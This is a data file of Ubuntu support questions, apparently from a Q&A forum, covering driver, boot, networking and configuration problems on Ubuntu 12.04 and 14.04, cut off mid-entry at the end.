< /output > < output name= '' virtual1 '' > < /output >
465406	gradle using terminal with android studio install on ubuntu 12.04	can not get the terminal commands to work with gradle . i trying to get gradle to work outside of android studio as a prelude to scripting up various flavors of my app . i got the flavors to build within android studio but i find the interface confusing . gradle was installed either with adt or android studio at : /home/mark/.gradle would like to use the install of gradle at /home/mark/.gradle . would like to avoid the gradle in the repo since android studio updates frequently and their a possibility that i could wind up with two different versions of gradle that could cause more headaches . so far i have tried setting the path various ways in .bashrc bash.bashrc environment files . nothing worked . not sure if i put the wrong terms/commands in those files or the files are wrong ones . tried the gradle term with and with out the dot as well . i would appreciate explicit instructions on terms/commands and in what files . thank you in advance mark91
465408	docky sidebars not allowing full screen	is there a way to remove sidebars in docky , this is so irritating that it does n't let the browser to use the full screen .
465410	issue with broadcom 4313 - wireless card very very slow in ubuntu 14.04	i have upgraded to 14.04 . when i was in 12.04 i got the drivers from broadcom website . but , now i ca n't get that for 14.04 . i am just a user and i do n't have much knowledge about ubuntu . i tried the answer from extremely slow connection with a broadcom bcm4313 wireless card but , my wireless does n't work properly . very very slow at around 5kb/s . when i connect to ethernet i get around 400kb/s please be little elaborate so that i can follow your guide .
465411	epson stylus photo r285 prints but no ink level ubuntu 14.04	i have recently migrated from win xp to ubuntu 14.04 . my printer works but does n't show ink levels . is there an add on i can download . i like ubuntu but not knowing which colour is empty will be a problem . can anybody help .
465412	how can i debug why gnome-settings-daemon-localeexec is not started on login ?	i am using ubuntu gnome 14.04 and gnome-settings-daemon-localeexec is not started on login . how can i debug why this is happening ? i 've found this question : gnome-settings-daemon not starting when i login , but it is not really a solution for me , so i want to debug it and find the real problem and probably file a bug if needed . i am an experienced linux user but i do n't know how the gnome shell startup proces works and where to start . edit : these might be related questions : how to debug slow session start of gnome 3 ? - > this one does n't help , the gnome-shell process seems to die upon login hence i see nothing usefull on strace output how to debug session startup issues ? - > this does not seems to be valid anymore edit 2 : i 've opened a bug report on launchpad , lets see if that helps : gnome-settings-daemon-localeexec is not started on login edit 3 : found these other threads that might help : [ solved ] [ gnome-unstable ] gnome-settings-daemon does not work - > added -- debug to gnome-settings-daemon and nothing is shown at ~/.cache/gdm/session.log debugging gnome shell - > does not help as gnome-shell is not crashing
465413	multiple problems installing 12.04 : low-graphics mode and usb not accepting address	so i recently got a new machine after having used 12.04 for two years , and decided to try out 14.04 ( alongside windows 7 ) . this worked just fine but i was unhappy with some of the changes and decided to go back to 12.04 . i selected the `` something else '' option during install and set it up like this : this installed fine , then when i went to boot i got a lot of messages that looked a lot like this : usb 1-4 : device descriptor read/64 , error -110 usb 1-4 : device not accepting address xx , error -110 when it eventually got past this screen i was greeted with a message : the disk drive /home is not ready yet or not present . continue to wait , s to skip mounting , m for manual recovery . it does n't take a genius to figure out that what 's happening here is some sort of inability to read usb devices during boot . this is a major problem , as /dev/sdc is an external hard drive , connected via usb , and if you did n't check the imgur album , is also where i put /home . the keyboard that i would use to press m or s in order to try to bypass this : also usb . googling told me that the error -110 code specifically has something to do with insufficient power . however , i only got this problem while booting into 12.04 . i get no problems while in a live session , or while using windows , or while using 14.04 , or while in the bios or grub . unplugging all but the external hdd and keyboard also did n't work . so , i decided to reinstall , this time using the `` erase ubuntu 12.04.4 and reinstall '' option . however , this causes a different , even nastier error . the installation completed and when i went to reboot/shutdown i was greeted with a very large version of the the system is running in low-graphics mode error , that was cut off , looking like this : http : //imgur.com/epeq9h3 . this error never goes away , the system never shuts down , i ca n't move my mouse and hitting buttons on the keyboard ( like enter , escape , arrow keys ) does nothing . i 'm forced to cut power to the system , which leaves grub corrupted and i am unable to boot into either windows or ubuntu . i have tried this last option five times now , and also tried installing gdm and grub in the live session , with no success . does anyone have some advice ?
465414	get total diskspace usign du for multiple directories	i know about du -sh which gives me total disk space used for given directory . my problem is the directories i am interested are scattered in lot of subdirectories . i have right `` find '' command that gives me these directories . goal is to pass directories found and get total disk space used by these directories if i pass these directories as arguments to du i get total used for that directory , but no grand total . i want to get the grand total . exampledu -sh dir1 dir2 gives output something like follows 17k dir1 55k dir2 what do i need to do to get the grand total ?
465416	what does `` no talloc stack frame ... '' mean ?	i am using ubuntu 14.04 on my dell xps 13 9333 . everytime i use the command line ( succesfully or not ) a short line is being put out instead of the usual fresh and empty line which you normally get if the command you used was succesfully processed . the line is always the same and it says : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory any idea what this means ?
465418	how to see packages included in ubuntu kit ?	i recently upgraded from ubuntu 13.10 to ubuntu 14.04 . i think i 'm having a problem with my wireless drivers , in that every hour or so , my connection drops , and i ca n't see my local network . what fixes this is me deactivating and reactivating the wireless connections . i 'd like to install the driver that i previously had on 13.10 , and i thought that if i could see what driver that was , it would be a starting point . is what iâm trying to do possible , and if so , how would i check what drivers are included in the default ubuntu installation ?
465422	desktop will not load after password login ? 14.04	i just installed fglrx and now my desktop will not load , my background image is displayed but i can not see any of my files or applications !
465426	xubuntu 14.04 and black screen with dash	once i finish installing xubuntu , when i boot i get a black screen with a dash in the left corner . that 's it . i do n't see any grub/xubuntu stuff , just a dash . this is a very particular problem , since only with xubuntu i get it . usually i can at least see the grub menu when i have problems with linux distros ... but in this case ... nada . i did n't do anything fancy : i have a 120 gb ssd and i told xubuntu to use the entire disk . any idea what can cause this issue ?
465429	usb drive mounting - noob question	ubuntu noob here ... i have a ubuntu 14.04 server installed with 4 internal sata drives . i 've recently added a usb 1.5 tb drive and used it for a while without issue . even more recently , i 've added a usb 3 tb drive and am now having problems . it would seem that the multiple usb drives do n't mount consistently when the system boots . it seems that when the system reboots , sometimes the usb drives are ( 1.5 tb ) /dev/sda and ( 3 tb ) /dev/sdb ; sometimes they are reversed and sometimes one of the usb drives shows up as /dev/sdf . i need a way to mount the usb drives consistently and do n't seem to be able to identify a way to do it . thanks in advance for your help ryan
465430	cisco vpn works , but can not get to desktop	i have configured the cisco vpn with the same info from winxp and have downloaded remote viewer but can not get to a desktop at work . i use remote desktop with win xp , but i am not sure what to use with ubuntu .
465431	where is wine1.7-dev in 14.04	in ubuntu 14.04 i can find these packages : wine1.4 , wine1.6 , wine1.7 and also : wine1.4-dev , wine1.6-dev now where is wine1.7-dev ?
465437	getting libboost-all-dev for arm machine linux -- uhd ubuntu 12.04 zybo armv7 32bit	basic info : i need to install uhd on my zybo board ( by digilent and xilinx ) , but can not . i have xillinux ubuntu 12.04 installed on it . it has an armv7 architecture of 32bits . ( go to bottom for question ) . the uhd software can be installed by following the instructions here : installation option 1 : http : //code.ettus.com/redmine/ettus/projects/uhd/wiki/uhd_linux an alternative installation process is : install git and download source code : sudo apt-get install git git clone git : //github.com/ettusresearch/uhd.git install all needed dependencies ( see build guide ) : sudo apt-get install libboost-all-dev libusb-1.0-0-dev python-cheetah doxygen python-docutils build-essential is a well packaged c++ library which is another needed sudo apt-get install build-essential install and run cmake : sudo apt-get install cmake next , to run the cmake program : cd uhd/host mkdir build cd build cmake ../ ensure that all tests that are related to the main , necessary dependencies are successful . install and setup library path : make make test sudo make install cd uhd/host/build/lib cp libuhd.so /etc/ld.so.conf.d sudo ldconfig sudo reboot ( i have also tried other website instructions and work-arounds ) . problem / question : however , the issue is that this software was made for i386 and amd64 machines . the zybo has an armv7 architecture . i used one installation guide which required the dependency of package : libboost-all-dev which is not available for my architecture . therefore i was only to install half the requirements for uhd . does anyone know how to build the installation so that it can run on armv7 architecture or how to download the package libboost-all-dev onto an armv7 processor ? thanks for the help
465439	fresh install of 14.04 , ca n't boot	i had fedora 20 installed on my laptop , but last night i used unetbootin to make a bootable ubuntu usb stick . installed ubuntu 14.04 , everything went fine , but when i restarted the laptop i got a black screen with a purple border . when i restarted the computer again , i got this screen : i decided to try to install xubuntu , and when i tried to boot from the usb it took me to grub , and when i attempted to boot up ubuntu i got the above screen again . note : i had ubuntu running seamlessly on my laptop before installing fedora , so i know it 's compatible with my hardware !
465440	ubuntu 14.04 not showing top bar or nautilus	i logged in and suddenly all i can see is my desktop , my desktop icons , and nothing else . my guest account works fine , however , and everything shows ! what happened and what can i do ? my top bar and side bar is gone and my window liner is gone to . help me ! ! !
465442	bluetooth is disable on ubuntu 14.04	the bluetooth is disabled on my ubuntu ( dell vostro desktop with bluetooth usb adapter ) . i plugged the bluetooth usb adapter to another ubuntu desktop ( 12.04 ) and it is recognized instantaneously . i 've tried a bunch of different solutions that i found on online forums , but i couldnât fix that . i 've installed blueman , bluez , bluetooth support package . the bluetooth system settings shows the message `` bluetooth is disabled '' even after i turn it on . bluetooth status is not shown in the menu bar even though i checked this option . `` rfkill list '' says bluetooth is n't blocked . `` lsusb '' says the dongle is connected . bluetooth manager does n't work ... all buttons are grey . removing gnome-bluetooth ( as some users suggest ) not only does n't fix the problem but also removes ubuntu-desktop , causing my system settings be missing among other consequences . bluetooth option is not shown in the bios . do i need t install a drive maybe ? does it exist ? all i want is to be able to connect my apple mouse and keyboard to the pc . please help .
465443	bluetooth not installed properly - xubuntu 14.04	i have installed xubuntu 14.04 and now when i switch on the laptop 's bluetooth hardware switch , i do n't see the bluetooth icon in the notification area nor in the indicator plugin ( as used to happen with 13.10 and earlier ) . i made sure that the `` bluetooth '' and `` blueman '' packages are both installed , than i tried starting blueman-assistant from the commandline and i got a message box saying `` no adapters found '' . what should i do to make blueman recognize the adapter ? i am on a 64bit version of 14.04 and using a hp compaq610 laptop . cheers .
465445	gnome web not import the bookmarks from google chrome	i 've decided to move my bookmarks from google chrome to gnome web 3.12 ( ex epiphany ) . but every time i try to import the file html generated from chrome , gnome web remain in stand-by and not import anything . is there someone can help me ?
465446	boot problem while loading unbuntu 14.04	trying to do a dual boot on an xp machine using ubuntu 14.04 . when it comes time to boot , these error messages come up : serious errors found while checking / . the disk drive for /tmp is not ready yet or not present . an error occurred while mounting / . i reformatted the disc in ntfs followed by a clean install of xp and all of the security upgrades . wanting to use ubuntu for on-line stuff for now . i had tried using a live cd for the ubuntu load , but the pc does not recognize the dvd . had to go through the download and opening the files through an iso program . no , it is not the unit . other programs opened fine in the dvd . i had downloaded ubuntu 12.04 and it was working fine , but 14.04 does not seem to want to go . any ideas or suggestions ? thanks . i am moderately literate in computer functionality , but am , relatively , new to ubuntu stuff . with the death of xp , and this being a working older pc , i wanted to give ubuntu a try . again , thanks !
465450	changing ubuntu and windows 8 queue at dual-boot	i recently installed ubuntu alongside windows 8.1 and i 'm new to ubuntu . i was wondering if i could change the queue from ubuntu to windows . actually , when at the boot time count down is started for about 8 seconds and during this countdown you have to select ubuntu or windows 8 loader etc . to boot up if you do n't select any of them it will automatically boot to ubuntu . i want to know how can i change or reverse it from ubuntu to windows . so , if i do n't select any of them it should boot automatically to windows instead of ubuntu because i use ubuntu less than windows .
465451	lost windows while installing ubuntu 14.04	i needed a dual boot of windows 8 and ubuntu . i googled and followed the steps and got it done , but the grub was not visible , so i made a reinstall and selected the option of deleting the previous ubuntu and reinstalling ubuntu . this option deleted all my data : ( and my genuine windows , and now i just have ubuntu . i did n't even create a recovery media . i just have a system recovery image on my external hard drive . i want my genuine windows back , but i do n't know how to recover it . anybody please help : (
465454	problem with the installation of virtualbox	i am trying to install virtualbox and make it work but it does n't seem i can . in the image you can seem the output . if i run vboxmanage -- version i get : warning : the character device /dev/vboxdrv does not exist . please install the virtualbox-dkms package and the appropriate headers , most likely linux-headers-generic . you will not be able to start vms until this problem is fixed . 4.3.10_ubuntur93012 but virtualbox-dkms is already installed and at the latest version . so i tried to reinstall it and i got this : any help will be appreciated . edit : the output after reconfigure ( @ m.tarun suggestion ) : edit 2 : also installed the sources as @ hmayag instructed , purged virtualbox and installed it again but i got the same problem .
465456	configure freetds to connect to ms sql	i’ve tried several different config options based on this page ( http : //enlook.wordpress.com/2013/05/02/error-sql-error-unixodbcdriver-managerdata-source-name-not-found-and-no-default-driver-specified/ # comment-2783 ) and a very similar post here at connecting ms sql using freetds and unixodbc : isql - no default driver specified however when i try to test the connection with isql i continue to get “ [ im002 ] [ unixodbc ] [ driver manager ] data source name not found , and no default driver specified [ isql ] error : could not sqlconnect” . i am running ubuntu 12.04 lts server and installed freetds via apt-get . results of odbcinst -q -d : @ cabana : /etc # odbcinst -q -d [ tdsdriver ] results of odbcinst -q- s @ cabana : /etc # odbcinst -q -s [ mssql ] [ sql01 ] tds.driver.template : @ cabana : /etc # cat tds.driver.template [ tdsdriver ] description = freetds driver driver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so setup = /usr/lib/x86_64-linux-gnu/odbc/libtdss.so fileusage = 1 usagecount =1 tds.datasource.template : @ cabana : /etc # cat tds.datasource.template [ sql01 ] driver = tdsdriver # name that we specified in the driver file description = mssql odbc driver trace = no tracefile = /var/log/freetds.log server = 10.0.0.200 # this name specified in the freetds.conf port = 1433 database = mydatabase tds_version = 8.0 freetds.conf : @ cabana : /etc # cat freetds.conf [ global ] tds version = 8.0 [ microsoft ] host = 10.0.0.200 port = 1433 tds version = 8.0 odbc.ini : @ cabana : /etc # cat odbc.ini [ mssql ] driver = freetds # name that we specified in the driver file description = mssql odbc driver trace = no tracefile = /var/log/freetds.log servername = 10.0.0.200 # this name specified in the freetds.conf port = 1433 database = mydatabase tds_version = 7.0 [ sql01 ] driver = tdsdriver # name that we specified in the driver file description = mssql odbc driver trace = no tracefile = /var/log/freetds.log server = 10.0.0.200 # this name specified in the freetds.conf port = 1433 database = mydatabase tds_version = 8.0 odbcinst.ini : @ cabana : /etc # cat odbcinst.ini [ tdsdriver ] description = freetds driver driver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so setup = /usr/lib/x86_64-linux-gnu/odbc/libtdss.so fileusage = 1 usagecount = 2 tsql is not installed so testing with isql i get this : @ cabana : /etc # isql -v sql01 user pass [ im002 ] [ unixodbc ] [ driver manager ] data source name not found , and no default driver specified [ isql ] error : could not sqlconnect what am i doing wrong ?
465459	why gnome desktop wo n't start after i log in ? after installing variety .	i 'm using gnome 3.10 on ubuntu 14.04 , with gdm as my default login manager . also , numix-gtk-theme and numix circle icon pack . for whatever reason , sometimes my system stops detecting wifi ( even if it 's already connected ) and i can only reconnect upon rebooting . after one of those reboots , i logged in , but was presented with the grayish gdm background , without no further actions . all i could do ( and i 've done this extensively since then ) was ctrl + alt + f1 and try some stuff out . after some research , i noticed that : startx worked at that particular session , but it was rather slow ; reinstalling , reconfiguring , both gdm and gnome-shell would do nothing ; the only thing that seemed to fix my problem was renaming /.config/dconf ; after rebooting , it worked . just now , though , i had to reboot again and the same problem happened . i just tried adding a new user . it worked within the new user , but then i do n't have any of the stuff i installed there . any thoughts ? if you need further info , let me know and i 'll edit accordingly .
465461	package rename and version drop	i have a package foo that is currently at version 2.3.0 i 'm trying to push the current development version into a ppa for my use . however , upstream the package source foo has been completely merged into bar , using their versioning system bar now 100 % provides foo ( with some compatibility link files ) , but there has been a version drop to 1.4.0 ( foo version matches bar from now on , bar is a more recent project ) in a rename i would just follow this guide . and introduce a dummy package in bar that has the same name as foo that depends on bar and the new version number ( caused by a rename ) would be picked up . however , with the version drop , the old version of foo will be preferred by apt because it has a higher version number . i tried package relation version : 2.3.0-4 in my debian/controlfor the dummy package foo in bar , but this throws an error dpkg-source : warning : unknown information field 'version ' in input data in package 's section of control info file , so it probably means i ca n't version the binary packages independently of the source package ( probably a good thing ? ) the only working solution i came up with is to upload a seperate meta-package foo with version 2.3.0-4 that depends on bar1.4.0 , but i do n't feel that this is the best solution because you have to maintain version numbers for the metapackage in perpetuity despite it being merged upstream . i ca n't reversion bar because it will break upstream version consistency . how can i resolve this without uploading an independently versioned dummy package in perpetuity ? can i provide : foo a specific version ? provide : foo2.3.0 ? is there a way to you version binary packages separately from their source ? i guess the other last second solution i came up with was to introduce an epoch number for all this nonsense and just proceed with the renaming as usual .
465464	desktop environment delivery via remote virtual server	i 've known since shortly after starting with various flavors of *nix circa '04 that the os is multi-user server environment . there remains a nagging issue that i just ca n't seem wrap my head around , and i 'd like to solve it . given that on effectively any virtual infrastructure ( whether i own it or not ) i can spin up this multi-user environment with relative ease and connect to it securely ( as i can ) , and given that i can install and securely deliver applicaitons at no additional cost per application via ssh command line ( which i can ) , why is complete , open delivery of a desktop environment such a pain ? vdi solutions exist , but are nearly all geared towards windows ; this makes sense given that the windows environment was n't designed with multiple users in mind . such tools that support linux exist , but are far less prevalent . frustratingly , there exists a costpoint that far exaggerates the value delivered . furthermore , solutions seem to exist within the current scope of *nix oss and ubuntu specifically via ltsp , but when put into a public space ( remote server ) , ltsp ( to my knowledge ) breaks down . getting to the question ( this is n't a rant thread ; i 'm just frustrated because i have n't yet found a solution to this issue ) , is there a way to deliver a full desktop experience ( sound , video , something skype-ish ) via remote ubuntu server to a local ubuntu client ( i 'll worry about other platforms later ) that does n't involve software costs ? here 's what i 've tried so far : ubuntu 12.04 and ubuntu 14.04 ( desktop and server ) using lxde delivered via xrdp - > everything works wonderfully , except for sound . ubuntu 12.04 and ubuntu 14.04 ( desktop and server ) gnome-session-fallback via freenx - > mixed results : 12.04 worked fairly well and i 'm still working on that [ video only , so far ] , 14.04 was a total bust : the only that works is an ssh prompt . ubuntu 12.04 and ubuntu 14.04 ( desktop ) applications deliverd ssh + x - > works , except for sound ubuntu 12.04 and ubuntu 14.04 ( desktop ) desktop delivered via xephyr - > remote screens blank any help is appreciated ; i 'll get back with the results of freenx on 12.04 as soon as possible - i 'm working this in addition to administrating a windows network .
465465	install ubuntu 14.04 abort due to weired mouse move with asus r409c	when i try to install ubuntu 14.04 , on an asus r409c , the touchpad works fine until the language selection step . then the cursor periodically moves to left ( about 1cm at once ) up to the edge of the screen and then freezes . during this weired cursor move , the touchpad does not respond to my commands . then , without touchpad , it is impossible to complete the install process . image ubuntu-14.04-desktop-amd64.iso . video card nvidia geforce gt720m . asus touchpad plugged into [ built-in ] ps/2 mouse port . same issue occurs with asus x550 . any help ?
465466	ca n't disable swap partition on usb persistence ubuntu 14.04 lts	i created an ext2 partition for swap and i got it working fine . i 'm new and just wanted to try it . but i do n't want to blow up the usb flash , so i tried to disable it and it 's not possible ! i try sudo nano /etc/fstab , and comment the line for swap : # /dev/sdb2 swap swap defaults 0 0 but it always comes back when i reboot . i tried deleting the line altogether , and it comes back . frustrated , i even deleted the fstab file and it came back when i boot ! i verify the changes are being saved ... i boot another usb drive with 10.04 and mount the 14.04 . my changes are there ! but when i boot , something is undoing the changes . what is doing this and how do i stop it ? thanks .
465467	can not get ntpdate cron to run	i 'm trying to have a daily cron update the clock on my 12.04 server . i 've followed the instructions here , but it still does n't run : after a few weeks , the clock once again is off by a few seconds . i 've been googling around for solutions , but nothing seems to help . from what i 've found on google , i 've verified the following : running the script manually works fine : root @ ... : ~ # /etc/cron.daily/ntpdate 13 may 14:42:22 ntpdate [ 6927 ] : adjust time server 96.44.142.5 offset -0.018984 sec the script is executable : root @ ... : ~ # ls -l /etc/cron.daily/ total 60 ... . -rwxr-xr-x 1 root root 46 may 12 20:41 ntpdate ... . i do n't see any cron-related errors in the syslog . may 13 06:25:01 ... cron [ 6704 ] : ( root ) cmd ( test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) ) i 've used an absolute path , just in case the cron path was missing it : /usr/sbin/ntpdate ntp.ubuntu.com pool.ntp.org i 've done a dry run : root @ ... : ~ # run-parts -- test /etc/cron.daily ... /etc/cron.daily/ntpdate ... i ca n't see any reason why it would n't be working .
465468	ubuntu + screen : auto-quit after a set time	i 've tried searching for this and get lots of urls leading to people having issues with their monitor . however my issue is with the screen utility . background : ubuntu 12.04 ruby 2.1.1 i have a ruby script that i want to run continuously keeping a connection ( websocket ) open to some pusher data i am consuming . however , there appears to be a flaw somewhere in the pusher stream because after an hour or so i begin to get an `` end of file reached '' message . it does not kill the ruby script . i have attempted to have supervisor kick off the ruby script but it never seems to work properly . so i have gone running via the screen utility ( screen -d -m ... ) . however , this tends to hide the `` end of file '' message that means i 'm no longer getting the updates i 'm trying to consume . so i 'd like to either create a program to monitor the ruby script and kill it or put some form of a timer on the screen call that would automatically kill the screen call after a set time and i would have a cron job to start it up again say once an hour . for the auto kill time i 'm thinking something like what can be done with curl where you put in an option and a number of seconds . if the curl process does n't die in that many seconds curl kills it . as a result you can set up timed curl processes without worrying about them building up and bringing down the server . any thoughts ?
465474	steam not opening , i get a segfault	steam wo n't open . firat @ makina : ~ $ steam running steam on ubuntu 13.10 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 0513/234529 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) installing breakpad exception handler for appid ( steam ) /version ( 1398287272_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140513234527_1.dmp /home/firat/.local/share/steam/steam.sh : line 755 : 4143 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-ed44de59-bde3-4ec7-9a41-e6d5a2140513
465475	un-auto-complete terminal	in the terminal , one can use the tab key to help auto-complete typing out a directory or file name . however , if i make a mistake and mistype the beginning of the directory and `` tab it out '' , i end up having to use backspace and re-type it in . is there a shortcut key to undo the auto-completion in the terminal ? edit for clarification to expand on what i 've said in a comment , i was wondering if there was a shortcut to undo to the last directory . so , currently ctrl+shift+- seems to work well except it un-does individual letters . for example , if i have the following directory setup : documents -- > d1something -- > d2something and i want to go to `` d2something '' but accidentally type `` cd d1 '' , it will autofill to : cd documents/d1something/ then , by using ctrl+shift+- it will then be : cd documents/d1something again : cd documents/d1 again : cd documents what i was wondering if there 's a shortcut to get from cd docuemnts/d1something/ back to cd docuemnts ( first and last step ) . if not , the ctrl+shift+- will work fine .
465477	screen saver in ubuntu 14	i know that a screen saver in not nessary anymore because of the displays ( montors ) that are out today but i would like to know how to install a screen saver program in ubuntu 14 , thanks
465478	tp-link tl-wn321g driver lubuntu 14.04 install	i downloaded the drivers from the main site but i did not understand correctly how to install on lubuntu 14.04 . what 's the correct way ? http : //www.tp-link.it/resources/software/200912314051713.zip here are the drivers thanks !
465481	ubuntu partition not accessible on a uefi laptop	i successfully installed ubuntu on my asus laptop . when i start the computer there 's no grub to let me choose which os i want to use , it starts windows 8 . when i try to put ubuntu as a first choice it does n't even appear as a boot option in the boot loader . from a post i read , said that if i 'm able to put ubuntu as a first choice in the boot order the grub menu will appear . how can i do this since the boot loader ca n't find or does n't have the option to boot ubuntu ?
465482	nginx load-balacing node.js , ssl not working	i 'm running 12.04 and using nginx to load-balance node.js and i 'm having an issue getting ssl to work . the problem using the configuration below , when i send any requests via https i get no response from my server . http : //app.domain.com works just fine , but https : //app.domain.com gets no response . load balancing i 've based my load-balancing strategy on this : http : //subprint.com/blog/nginx-load-balancer-and-reverse-proxy-for-node.js-applications-on-digital-ocean nginx version 1.1.9 . my conf file is /etc/nginx/nginx.conf user www-data ; worker_processes 4 ; pid /var/run/nginx.pid ; events { worker_connections 768 ; # multi_accept on ; } http { # # # basic settings # # sendfile on ; tcp_nopush on ; tcp_nodelay on ; keepalive_timeout 65 ; types_hash_max_size 2048 ; # server_tokens off ; server_names_hash_bucket_size 64 ; # server_name_in_redirect off ; include /etc/nginx/mime.types ; default_type application/octet-stream ; # # # logging settings # # access_log /var/log/nginx/access.log ; error_log /var/log/nginx/error.log ; # # # gzip settings # # gzip on ; gzip_disable `` msie6 '' ; # gzip_vary on ; # gzip_proxied any ; # gzip_comp_level 6 ; # gzip_buffers 16 8k ; # gzip_http_version 1.1 ; # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript ; # # # nginx-naxsi config # # # uncomment it if you installed nginx-naxsi # # # include /etc/nginx/naxsi_core.rules ; # # # nginx-passenger config # # # uncomment it if you installed nginx-passenger # # # passenger_root /usr ; # passenger_ruby /usr/bin/ruby ; # # # virtual host configs # # include /etc/nginx/conf.d/*.conf ; include /etc/nginx/sites-enabled/* ; } the server file i 'm working with is /etc/nginx/sites-available/default # # load balacing that will eventually include more servers . # upstream app_upstream { server 123.456.789.100:9000 ; } # # http server for testing ; will eventually do nothing # but route http - > https . # server { listen 80 ; server_name app.domain.com ; location / { proxy_http_version 1.1 ; proxy_set_header upgrade $ http_upgrade ; proxy_set_header connection 'upgrade ' ; proxy_set_header host $ host ; proxy_set_header x-real-ip $ remote_addr ; proxy_set_header x-forwarded-for $ proxy_add_x_forwarded_for ; proxy_set_header x-forwarded-proto $ scheme ; proxy_cache_bypass $ http_upgrade ; proxy_pass http : //app_upstream ; } } # # ssl server . self-signed certificate . # server { listen 443 ssl ; server_name app.domain.com ; ssl on ; ssl_certificate /etc/nginx/ssl/server.crt ; ssl_certificate_key /etc/nginx/ssl/server.key ; location / { proxy_http_version 1.1 ; proxy_set_header upgrade $ http_upgrade ; proxy_set_header connection 'upgrade ' ; proxy_set_header host $ host ; proxy_set_header x-real-ip $ remote_addr ; proxy_set_header x-forwarded-for $ proxy_add_x_forwarded_for ; proxy_set_header x-forwarded-proto $ scheme ; proxy_cache_bypass $ http_upgrade ; proxy_pass https : //app_upstream ; } } self-signed ssl i 'm using a self-signed ssl certificate generated by following this : https : //www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-nginx-for-ubuntu-12-04
465483	ubuntu 12.04 wireless issues ( not getting internet )	i recently downloaded ubuntu 12.04 and removed windows 7 on a dell inspiron n1050 . i connected to my ( hidden ) wifi network and it was working perfectly without any problems , until i wanted to download a file . after 200 mb it just stopped . i wanted to search for a solution but i did n't have an internet connection anymore . it 's working again when i turn wifi off and back on . this also happens when i watch a movie : it suddenly stops buffering and my internet is unavailable until i turn wifi off and on again . how can i fix this ? output for sudo lshw -c network [ sudo ] password for junior : *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 34 serial : ac:72:89 : e3:57 : b5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-20-generic firmware=18.168.6.1 ip=192.168.1.107 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:48 memory : d0600000-d0601fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 84:8f:69 : b0:15:76 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff
465488	xsetkbmap , odd behaviour using the device option	i found in two keyboards two language layouts that it is possible to assign a specific layout to a specific keyboard device . i want to use a keyboard as a pure hot-keys/macro one ( for commanding the functions of gimp , photoshop or mangastudio ) , by creating a keyboard layout comprised of unicode characters outside the ones present in my other keyboards , and then using autokey to creating the actual macro calls . not as seamless as hidmacros in windows , but still manageable ( also , autokey has a filters on window names that would allow to keep uniform the shortcuts layout , no matter the application in use ) . the first step , was checking the behaviour of setxkbmap in my system . i proceeded to check my xinput list , obtaining $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:400e id=10 [ slave pointer ( 2 ) ] ⎜ ↳ wacom intuos2 12x18 stylus id=11 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=14 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=15 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=17 [ slave pointer ( 2 ) ] ⎜ ↳ wacom intuos2 12x18 eraser id=19 [ slave pointer ( 2 ) ] ⎜ ↳ wacom intuos2 12x18 cursor id=20 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ cnf7051 id=9 [ slave keyboard ( 3 ) ] ↳ chesen usb keyboard id=12 [ slave keyboard ( 3 ) ] ↳ chesen usb keyboard id=13 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=16 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=18 [ slave keyboard ( 3 ) ] ↳ sigmachip usb keyboard id=22 [ slave keyboard 